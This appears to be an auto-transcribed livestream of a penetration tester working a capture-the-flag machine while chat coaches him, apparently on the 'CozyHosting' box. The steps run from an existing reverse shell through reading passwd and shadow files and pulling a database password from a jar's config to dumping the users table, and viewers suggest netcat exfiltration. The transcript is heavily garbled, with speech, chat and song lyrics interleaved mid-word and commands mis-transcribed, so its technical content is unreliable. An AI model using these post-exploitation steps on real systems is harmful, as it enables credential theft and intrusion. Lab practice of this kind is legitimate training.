my consumption is switched to my consumption is switched to other things, like it's water, milk. I didn't cut out salty snacks. I think I'd kill someone. But I'm compensating a little bit here. But I'm just eating way less sugar and no alcohol. The alcohol is.
Cure says.
I can't wait to hear what you think of European food.
Symmetric says.
I know, I'm excited.
I don't buy water.
Hey,
Okay, I lie.
dude, they got me scheduled on more assessments. So I actually do the Netherlands twice. Ireland
Dick.
Translated from Dutch.
and Melbourne.
Pizza in
I'm so
Italy is
excited.
mediocre at
I'm so
best.
excited. The first assessment, not for travel, the first remote assessment is in 2 weeks. Next week, I gotta put together a presentation for Hack YSU coming up again. That's on the 15th. I'm gonna need everyone hanging out for Hack YSU again, Saturday, September 14th. And then the assessment and some other stuff. I can't remember.
Oh shit, let me know when you're back in NL and Ireland.
Okay.
Loaf says.
Any Irish person will let you onto their network for a sack of potatoes.
I'll allow it. That's like saying any Italian will let you on for a bowl of pasta. Loaf, did you hear? Did you hear the other place?
Symmetric says.
Sack of potatoes equals fries?
Naughty Dogful says.
What do you do during that?
Symmetric says.
The penetration
Or
testing
bag of chips.
assessments.
Loaf says.
The Netherlands? It's not Australia.
I said Melbourne. I thought I said it right.
Amused.
Naughty Dogful says.
In layman's terms,
Yeah. So the company I work for is hired by companies to hack them. It's an oversimplification. We do things like that are called penetration tests or assessments, and then we do that, and then we write up the report and we show them what we did, how we got in, and so they can fix it.
Loaf says.
have you tried hacking upside down yet?
I haven't. I'm gonna have to start hacking upside down.
You will have to try Tato crisps when you head to Ireland.
Crisps. That's right.
Oh. Company name equals. I wanna hire you to hack me. How you got in?
Naughty Dogful says.
So optimistic.
okay.
Symmetric says.
So optimistic.
Caveman Crafting says.
You should check out that red agent.
You saying you're unhackable, Zemetrix? I bet you click on everything, don't you? I will, Caveman Crafting, I will. Are you still shopping?
Symmetric says.
Lol.
Ted2 says,
Hi there.
Caveman
The D,
Crafting
what's
says,
up?
I'm thinking of adding social link module to it, including a voice clone Helio app.
You should.
Metric says,
I can't say yes, I'm unhackable. Because that is a direct challenge to anyone reading it.
Oh, not because it may
No.
not be true, but it's just because it's a challenge.
Caveman Crafting says,
Having lunch at Freddy's.
We need information on Freddy's. What are they known for? Is it a diner? Is it a food truck? Okay, so I know. Here you go for notes, buddy.
Sounds American far.
GoProFloyo says,
Fight afternoons at Freddy's. 5.
Caveman Crafting says,
Like steak/shake. They got good custard and hot dogs.
Oh, we need to do a GoPro shout out. Are you
Metric says,
spinning today, GoPro? What do the DJs call it these days?
Caveman Crafting says,
Americana ballpark food.
Metric says,
Twitch DJs call it pressing play.
GoProFloyo says,
No, because Knockout won't get up lol.
Metric says,
Equals.
002 says,
Yeah,
No cat sleeping? Hey. Take the earbuds out. Put your phone next to her.
Heck Inspector says,
Wait till Theo starts saying you had a bangin' set GoPro.
That's right. They did have banging sets.
GoProFloyo says,
Okay, earbuds out.
No.
GoProFloyo says,
Speakers next to her.
I can't do it now. Oh my god, it just got awkward. It just got awkward. Can't do it.
Metric says,
Think him having buyer's remorse on this house.
Why?
Mighty Dogful says,
Theo, well, have a good stream. I'm going to start mine and play some marathon. Hit me up. Good luck on the no sugar and alcohol. That's rough.
Right on.
Hewer
We'll do.
says,
Do it. Do it.
Metric says,
The garage slope is fucking insane.
Garage slope.
It's literally 7 inches drop from rear of garage to the threshold.
Oh, so it's coming out of the garage. Whatever. Pour some concrete and fix it. What are you complaining for?
You're 7 inches over 30 feet. Lamar.
translated from Haitian Creole.
Oh, DJ Zero. Absolutely not. There's no such command.
Nice.
002 says,
A surprise.
Metric says,
Fucked up the concrete.
GoProFloyo says,
I'll give you 7 inches.
Absolutely.
Metric says,
Spooling concrete.
Heck Inspector says,
NeoVim is best text editor.
Damn it.
NeoVim is best text editor.
Absolutely not.
NeoVim is best text editor.
NeoVim is an abomination.
NeoVim is best text editor.
Absolutely not. Okay, I am. What am I doing? I'm trying to see what permissions I have. I can't run sudo L. Can we dig around? Can we root around?
All Vim and variants are terrible.
Incorrect. Vim is okay. Vim is acceptable. NeoVim is an abomination and should be wiped from the face of the planet.
GoPro Floyo says,
Big Ed fan here.
So who's Ed?
We should all use Ed scripts.
Oh, it's a text editor. It's what's in cloud hosting?
Metric says,
Vim is only held in high regard by those who never learned how to type properly or can't type greater than 40 WPM.
I can type greater than 40 RPM. 45-ish.
RPM lol.
Did I say RPM or WPM? I said RPM.
Heck Inspector says,
Only thing that comes close to the amazingness of NeoVim is Doom Emacs.
Wait, there's a Doom Emacs? That's awesome.
Web link.
The jar file. That's what I thought. Can I do... Is that the version? God damn, is it cold down here? Oh, you know why? Because it's like supposed to be 50 degrees today.
Theo and I complain about being cold.
Metric says,
Oh man, it finally was greater than 50.
Heck Inspector says,
Haha, GG the Orbit.
Translated from Tagalog, Metric says,
Been waiting like 2 weeks to wash my car.
Okay, that must be a thing because it's all over the place. I need another connection. Volts. You know, gang, Gemini's going places. I'm really impressed at the speed that Gemini operates at.
Heck Inspector says,
It's 55 where you are, Theo. It's 20 here. Lol.
That sounds terrible.
I think you already exploited the vuln if you're on the server tone.
Metric says,
Yay.
GoPro Floyo says,
Seen Google anti-gravity?
Loaf says,
What users are on the box?
I have seen that anti-gravity.
Let's all thank the tiny communites that are being destroyed so people cannot have to learn anything equals.
Tiny communities are being destroyed so people cannot have to learn to do anything. What the hell are you talking about? You're talking about them building AI data centers?
Metric says,
Data centers. Power draw.
We're getting one of those nearby.
Says,
Displacement.
Metric says,
Dick.
Translated from Dutch. Grey Hatter says,
He means how AI is helping people ruin the world.
I'm surprised you didn't come in guns a-blazing with DoD Anthropic shit. That's what we were talking about earlier on.
Metric says,
That's all make-believe fake news.
GoPro Floyo says,
Whiles Metrics knows the DoD is a scam.
Ethereal Six Toe says,
Blast.
I don't think that's it. Oh, no shit. That's a new one. We have Laurel with, that doesn't look right. Josh.
Symmetric says,
Thinking about going to the gym here.
Going to the gym to exercise.
GoProFlowio says,
Laurel is some system service.
Okay, so then we have Josh.
Symmetric says,
Nah, just unpacked my blue jacking shit. Equals.
Just a little, just a little looking around, just a little war driving.
Gym rat chicks equals.
GoProFlowio says,
Hot Rat Summer.
Symmetric says,
More like hood rat summer.
We all like what we like.
Is it almost political talk hour?
No, we had that at the beginning of the stream. Where were you?
Was out running errands equals.
GoProFlowio says,
In 10 meters. Once he finishes the box.
Yeah. What time's her? She's got a soccer match at 4. And we gotta have her there like 3:40. So okay.
Symmetric says,
Finally got my car washed. Was out being a productive member of society. Pure consumer mode.
What was I doing? Oh, you had tried Shadow.
Ethereal Six Toe says,
Which field in that output is the password field? I forget.
So you're not going to have it in this one.
Multi-clipboard.
In Shadow, in Etsy Shadow, you would have the hash.
Hinakamer9 says,
You can try get and pass to Kadi F1 for list of usernames.
Yeah, we ran that. Google actually suggested. I don't know where it went.
Loaf says,
They also have a hash in the database.
Get G10 password. Yep, that's what it was.
Carolina style app that adds shit to tabs. So you can be like cat/etc/password greater than Clippy, then you get a tab on your side that is /etc/password with the contents.
We tried sudo L. That was the other one.
This way you don't have to repeat commands, and maybe a session history.
can't leave you right now. Go crazy, cause that's what they've been telling me. Oh, oh.
$80 and $22. Where do you know about?
Its app says.
Initializing hacking the mainframe, accessing terminal, proceeding to start NeoVim.
Poof. Damn it.
Its metric says.
Ha.
Its app says.
Got E. M.
How you doing, its app?
How you doing, Theo?
I'm good. How are you?
I'm doing well.
Its metric says.
Straight up said Neofin before you puffed it. Obviously TTS knows what's up.
I'm fighting a losing battle, aren't I? I feel like this 5432 on local host.
Telnet to it.
But I can't.
GoPro Floyo says.
It may be only internal, though. I don't think I can.
Its app says.
I had to play around with Copilot Agent, and it's pretty good, but I am not amazed.
Its metric says.
You need to use Claude skills.
Curl it. Finger it. Dig it.
Jesus, easy. Can you get a first date at least? Terrible.
Loaf says.
Why are you doing it locally? You have a rev shell.
Hua says.
Lol.
Loaf says.
It's listening on localhost on the remote machine. Curling locally isn't going to hit.
And curling remotely isn't going to hit.
Its app says.
It's listening to your mom.
Loaf says.
You don't currently know what's running on it, even though /etc/password and process list gave a hint. You can always Google it.
Oh, wait a minute. I think it's a Postgres database.
You saw it was bound on localhost 127.0.0.1 on the remote server. That means it's not listening on an internet routable address unless there's a reverse proxy pointing to it.
Its app says.
What are we hacking?
Loaf says.
i.e. the commands you run against it have to be done on the remote machine unless you've set up a tunnel, proxy, port forward.
Symmetric says.
So honest question. How big is too big for a garage TV?
It's Hap says.
Cool.
That's how tall are the ceilings. How big of a wall do you have? Why not just get a projector? Paint a wall white and just use a projector. Okay.
Florio says.
7 inches.
To be done on the remote machine unless you set up a tunnel proxy port for it. But I can't. Oh, wait a minute.
Symmetric says.
13. Was thinking about buying an 85 inches but didn't want the neighbors being like this fucking motherfucker.
GoPro Florio says.
Most women will say the size doesn't matter.
Can I
of the TV,
put
that is.
a...
Loaf says.
No.
Viewing distance is a deciding factor to how big your TV would be.
Symmetric says.
At night that'd work great, but during the day. No bueno you unless I dump a small fortune for a decent projector.
Loaf says.
PSQLV, does it have it?
I was thinking about...
Sequel Cly.
Yeah. It does. Okay, I was overthinking it. Or at least I didn't check something before I thought about it.
Creds are gonna be stored somewhere you might be able to read.
GoPro Florio says.
Gotta steal the DB password from web app configuration somewhere.t.
Loaf says.
Maybe in a config file, maybe in the jar, which is basically just a zip file.
Can I do no pass? Send. No password supplied. It needs a password. It's app. The username is app. It's default. Password for app. Excuse me. What's the didn't we get the version? Maybe there's a that's right. Help. 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 Oh no, that's the version of the interactive terminal. You need the version of the excuse me.
Loaf says.
Caps V for version.
Lampmaster says.
Hey B7H30 Smile, you have fast
Hi,
touch
Lamp
on your system.
Master.
I want to see your hardware/env smile.
I don't. It's on my profile. Thanks for popping in chat and saying hello. But yeah, it's on my profile. Profile page, about page, my Twitch about page.
Loaf says.
What are you looking for the version of?
For the PostgreSQL database, it's not letting me log in without a password. And I don't have a password for app.
14.9.
That's PS.
You don't need the password for app.
I tried logging in without it. It won't let me.
You need the password for the database.
I didn't get any passwords yet, did
Something on
I?
the box is connecting to the database. Probably the website.
LAN PC Master. Did you get that?
The credentials and database information will be stored somewhere on the server. Likely readable by the web app user. Otherwise it couldn't use it.
Yeah, all I have is a token just yet. Okay, so a quick enumeration.
Its app says.
I agree with Noah Kujoro. Must be somewhere on the server. Can decompile the jar.
jars of zip. How big is it? Oh my god, it's huge. Strings is going to be massive.
Loaf says.
It's huge.
Yeah, isn't it? Yeah. Hmm.
$60 megabytes massive. You can put the H on there to get human pleb numbers.
Dash H.
Its app says.
Grab TB perhaps.
Remember last year, how'd it go? There was nothing inside to just let go. Can't even hold
Yes.
fall apart.
Its app says.
Or password even low.
Yep.
Walk out of doors, forget all of our past. Pretend you didn't leave while I was crumbling in the dark. Wide awake, but you're not here with me.
Hua says.
What do we think? Should I order a MacBook Pro and pick it up while I'm in Omaha?
Oh, it depends. You get a good price on it?
Its app says.
This just looks classes. Will it print out the contents of the files as well?
Heck Inspector says.
M5 Pro / Max series coming out soon.
Grey Hatter says.
I mean, I'm just
Framework is worth
strings.
spending money on. Apple is not.
Hua says.
Saving £500 on it.
Well, then yeah, I would.
Heck Inspector says.
I'm sorry, Dave.
A framework is
I'm
better
afraid
for
I
right to
can't
repair,
do
not
that.
for performance.
It's Hap says.
Try grepping for public void. I think that is common Java.
Grey Hatter says.
Framework is better, ethically.
Hey, I got two of those.
Six Toe says.
Is jar copy it and change? Jarju. Zip and unpack it?
Heck Inspector says.
Just woke from my sugar crash. Lol.
Ethereal Six Toe says.
Oops.
Grey Hatter says.
I don't care about how company treats people is not what good people say.
It's Hap says.
Or you want backseating?
I mean,
Dazo says.
JD
everyone kind of is right now.
Compiler. Viewer on Linux.
Thanks. So I'm on a system I'm not supposed to be on, so I may not have all those JD GUI. Well, let me install it.
I'll be silent for a bit skeptical.
Doesn't look like I have permission to install. I could upload. I could probably host a Python server on my attack machine and wget it on the victim machine. But let's see here. What else do we have? Or can I do it the other way? Can I pull it down? Do I have Python? Maybe.
Kitty says. I was not aware they was already taking auditions for a mall Santa.
Hi, Nori. Neither was I. What are you talking about? I locked it.
You wearing Santa jacket? Very red Noiki one.
Oh, thank you. Yeah, I locked it.
Dazo says.
Just need to grow the beard out a bit and add a Santa hat.
Thank you, Dazo. Welcome back. Okay, let's go the other way then.
Also, hi there's Noiki one wave. Translated from Italian.
Oh, it's a GUI. Yeah, as in the name, as it's apparent in the name.
Ethereal Six Toe says.
What progs are in /user/bin?
Those. A lot. JDCMD. JDCLI.
I'm doing it now, doing it loud every day. Yeah, like guns, drugs, I've seen it all. But that was not the path I chose. Frequency was way too low, so I avoid. Keep moving on, keep moving on, keep moving on, keep moving on. The latest hours, I evolve my power. This is the moment to do it louder. I didn't know that could take me miles away.
Okay, so what was the other one? Jar? No, JD.
Loaf says.
And zip tools?
I'm sorry,
You can
Dave.
always try straight
I'm
extract.
afraid I can't do that.
You won't get any decompiled code, but you may get a plain text config.
Doesn't
Unzip
look like you
exists?
have available. Oh, unzip. I did zip. It does have unzip.
If not, you can exfil using netcat.
It's Hap says.
I'm curious, what is the most fun thing you've hacked so far?
That's I don't know, honestly. I still love, even though I'm trying to execute more complex reverse shells. Those are always fun. Think about that a little bit more.
Nice.
Everything was permission denied.
Loaf says.
Unzip somewhere you have permission to.
Grey Hatter says.
That's what the judge told me.
Ethereal Six Toe says.
Mukter.
No, I should be able to unzip it. Do I need to give it? Maybe I do. I gotta give it.
Metric says.
Okie dokie.
Okie dokie. You out of here?
Ordered a 100 inches TV for the garage. JK.
Thank you. I can stop rolling my eyes. What I gotta do?
Lol.
Loaf says.
Use D for destination.
Damn it. DEXTIR. Cannot find or open temp.
Metric says.
I hate that HDMI is such trash but DisplayPort can't run the same length equals.
Loaf says.
Your comprehension of command line order baffles me sometimes.
I always okay.
Metric says.
Unzip.
Lamau.
Translated from Haitian Creole.
It should be one of the next ones. Oh, it comes at the end.
Loaf says.
Unzip file dest.
You say that it's hard and you swear that you tried, but I still feel alone on my own almost all of the time. 'Cause it's up and it's down and you're in and you're out. Look away.
Grey Hatter says.
I'm sorry, Dave.
Happens when your mental
I'm
model
afraid
for
I
ordering
can't
is
do
borked.
Metric says.
I mean unzip defuck, web link.
Loaf says.
It should, but that's not what was done.
Metric says.
And 2 greater than 1. Or /dev/null 2 greater than and 1.
Loaf says.
Grubber password /tmp2 greater than /dev/null.
I'm sitting through the cold to wait for missing pieces to unfold. I'm searching through my remains
Symmetric says.
Word wrap off equals.
Tigran says.
Hello, Theo.
Ethereal Sixto says.
Hi,
Hi,
Gran.
Thulis.
I think that's it right there.
Symmetric says.
Or greater than out.
Loaf says.
cat/tmp/boot-inf/classes/application/properties.
Symmetric says.
And open out in a proper editor like Fscode equals.
Collecting all the pieces from my whole.
Username Postgres password.
Loaf says.
Database name, user and password for PSQL.
Symmetric says.
Data source password. Gandalfzak 7xxr.
Translated from German.
It's fucking wild how
I'm
few
sorry,
people
Dave.
use Craigslist here.
I'm afraid I can't do that.
Everyone is a Facebook fiend here. Posted a 10 inches Craftsman table saw for free. And literally 0 MSGS.
Sometimes the road is broken, but we just keep on holding on. The future isn't known yet. We do our best to stay strong. No space in time. What's yours is mine. The burden heals inside. I'll be your guide. Have faith and try to see the light in the darkness. So I want you more than anybody else. I hold you when you're going through hell. I love you more than anybody else. Anybody else. Anybody else. I want
Caveman Crafting says,
Now chilling with kid in car while wifey does her shopping, haha.
Smart.
My CTO is through the 5 epics for the dialer.
Smetric says,
What store? What car? AC running, trick question, of course it is.
Caveman Crafting says,
Car and AC going tongue. Well, AC going, car parked.
Smetric says,
Sounds like a Hyundai. Smile, smile. Speaking of cars, thought about building a 6 square body from frame up.
Correct.
Lol.
Heck Inspector says,
Nap time?
Spring database. Spring JPA database equals. I don't know if it's PostgreSQL or I think it is. JDBC. No. Let's just log into this thing now.
broken faces. Everybody got a line, it's time to cross it. I've never seen so many people ain't believing themselves. You only got one life.
Connection host. PSQL. Local host. Username. Password. Password supplied. Maybe you need quotes.
Loaf says,
Username was just Postgres.
Postgres.
And you should quote that password because it might be seen as, run this process in the background.
It's asking me for it again. Connection to the server localhost to failed FATA database. It's taking that as the database. Let me get rid of that in the command. Broke it.
Select from users. See if that works.
Oh, it is.
So you haven't selected a database. You need to find out how to list databases. Probably something like \dbs or \list or \databases.
/list.
Use cozy hosting.
Oh, I need to fix that. The Real Six Toes, thank you for the follow.
Caveman Crafting
I'm sorry,
says,
Dave.
Docker
I'm afraid I
FTW.
can't do that.
Also, that's another thing I'm doing that I don't think many public skills do. I have all skills run in Docker containers.
Ethereal Six Toe says,
G2G. Thanks and have fun.
Right on. Thank you.
In your warm embrace, I lose myself. Nothing else matters. In time and space, there's nothing else. No. 'Cause I've been waiting for my life, for one like you to light up the sky. Gonna watch you do to the black and white. When I'm with you, I see multicolor.
Loaf says,
Web link. Chi /C cozy hosting.
Through a burst of color, a kaleidoscope, illuminate like no other. Yeah, I've been waiting for my whole life, for one like you to light up the sky. Gonna watch you do to the black and white. When I'm with you, I see
/DT.
translated from German.
When I'm with you.
You had me spellbound. Believing every word you said. Now that I know better and I'm grown now.
Tables. Display tables. DT tables. We just slash DT.
Nothing more and nothing less. Baby, now you know I made up my mind. And I ain't gonna come crawling back. You're trying so hard to be relevant. You're breaking hearts just for the hell of it. Oh baby, I think you should get a grip. You can check out your reputation. I'm done with all them conversations. Baby, I turn off my location.
Display columns. Field names of the table. So,
Heck Inspector
the
says.
users.
You know what?
Chicken butt.
I gotta do something. Because.
Do it.
Thinking about the things that won't lift me up, wouldn't keep it in my mind. All those things that won't lift me up, just care about you and I. I just care about you and I. Just care about you and I just care about you and I just need some
Metric says.
You are not quitting, are you?
to get myself together. You can't keep me up.
Tigran says.
Debian server good one.
Heck Inspector says.
Lol, don't hear it at all.
Nailed it.
There.
I'm gonna have to soon.
Lift me up. I just care about you and I just care about you and I just need some sunlight, feel it in my bones to get myself together. You can't keep me up. This blood runs through my veins. It's all on you.
So I have two tables, public, no, hosts and users.
Don't make me go, just care about you and don't make me go, just care about you I just need some sunlight, feel it in my bones to get myself together. You can't keep me high, this blood runs through my veins. It's all on you. It's all on you, so don't make me go away from you and
Let's take template 0. 2. Database size, description, expand narrow table lists. Use X. Show table listings in wide format, narrow format. encoding to connecting the database, list of tables, D&D display columns, D plus field names of table. Use D plus. I did that. Maybe I missed it. List databases. D plus. Display user roles. Hosts. Name hosts. Host ID, IQ, secret, and users. User roles, creating. I don't want to create, I want to add. That's it. What did I miss? Oh.
Loaf says,
Talk through what you're doing.
I'm trying to. I'm connected to a database, Cozy has thing. We listed the tables. Now I want to look at D plus hosts, public. Shit. D plus users.
You know how a database works?
Yeah, kinda. It's been a while.
There's a database
I'm sorry, Dave.
which contains tables,
I'm afraid
which
I
contains
can't do that.
columns, which contains rows of data.
Yep, so we have the database Cozy hosting. We have in the databases tables of we have hosts, host IDs, SEQ, and users. In the tables, there's columns, and in the columns, there's rows of data.
The \D plus table you did describes the table schema. Do hosts as the columns, id, username, hostname. \d plus users shows name, password, role columns. You can select call one greater than colx from table name to see the row data.
That's what I want right there in users.
It's time I grow stronger. You were all I wanted. I don't want you to forget me. And I feel like I am losing myself, 'cause I keep on crawling back to you. So I keep wondering, why do I want to just call you? You won't know it's hard to, 'cause I know it's there. But you let me keep on falling.
Select is its own command. You need the to terminal your SQL when not using inbuilt CLI commands.
It feels like I'm fading, it no longer matters, but doing what I wanted. So I keep wondering, why do I want to just call you?
When you didn't use the first time, your SQL spread across 2 lines.
Loaf says.
So you had select role from users, select role from users. Do it once and include the semicolon.
Loaf says.
So there's a user role and an admin role. Two rows in the table, one user is an admin, one is a user. You can select more than one field. Select name, password, role from users.
It makes me uncomfortable, yes, the feelings are mutual. To feel something so sweet in the thick midsummer heat, pulled out by the undertow, washed up right onto the shore.
You didn't terminate your SQL again, so you're gonna get an error.
I swear I've done SQL queries before, but anything like beyond, I don't know why I get so mixed up. I forgot what I even learned. MSSQL? I don't know. SQL Server. Anything beyond, like, I don't know why I struggle with it so much. It's just because I've done it so long ago.
You just need to do it more.
Metric says.
All SQL is nearly the same.
Loaf says.
Select statements are pretty universal.
I forgot about the semicolon too.
Only slight syntax changes.
Yeah, I mean, I've done those before. Select role from users. Select admin from role. Select, I've done those. I've done those before. I forgot about the semicolon, and I've done that before. You have to select the database. You have to, like, I need to do it more often. Yep. But I want to keep going, but I can't.
You don't need, if you only have one statement.
Tech Inspector says.
Never say can't.
Right on. Snooze. Oh, that's the last snooze I got. I gotta find something fast.
Nothing in this world that's worth having comes easy.
Loaf says.
You do in PSQL Clay.
Metric says.
I can't quit. Okay, never say can't. I quit.
Loaf says.
Oh, we'll get into Kira.
C in the command line and not going interactive PSQL.
Heck Inspector says.
What are you finding?
I gotta raid out. Small Beanie Hacker, we gotta leave for her thing in like 15 minutes, 10 minutes.
Loaf says.
I can't. If I wait any longer, I can't.
Even be able to crack
You got no idea. I want to, but I can't. Loaf, thank you again. Helping me with the reverse shell and the syntax and understanding it more. And the cozy hosting database too. Thank you.
Heck
Yeah,
Inspector says.
Small Beanie Hacker's got one at like, we gotta leave in 15 minutes.
She can drive. Tongue.
Loaf says.
Did you said there's a soccer game? If there's soccer, that's so ironic. Because the password is a soccer team.
Shit.
See ya Theo. See ya Cap.
Translated from Tagalog.
Is he back there? Yeah.
Thanks for the stream.
Thank you.
Metric says.
You need a keyboard cover.
Hey.
To cover your hands
Thanks for hanging
while you
out.
type so you can't look at the keyboard.
Caveman Crafting, Spectre, Loaf, The Real Six Toes, Tigrans, Zemetrix, thank you. That's all that's still in here? At least that are chatting?
Heck Inspector says.
Yeah. Ragano, Pinnet Gamer, Pure,
Tigran says.
Sick in the Mind,
Translated from
Tigrans, thanks Metrics. Keyboard cover. Whatever.
Metric says.
Oh slash.
I'm sorry, Dave.
Kitty says.
I'm afraid I can't do that.
See ya. Thank you guys for hanging out. Did the raid take? What do you mean invalid? You're invalid.
Heck Inspector says.
No.
Oh, I used the @ sign, that's why.
Lol.
All right, gang. Thank you. Thanks for watching an old man struggle again.
Riff Raff and Bound.
Can't stop.
B7H30.
Won't stop.
B7H30 hacks. B7H30.
Let's go. Have a great day.
Tech Inspector says.
New.
Translated from Malay.
Weenie.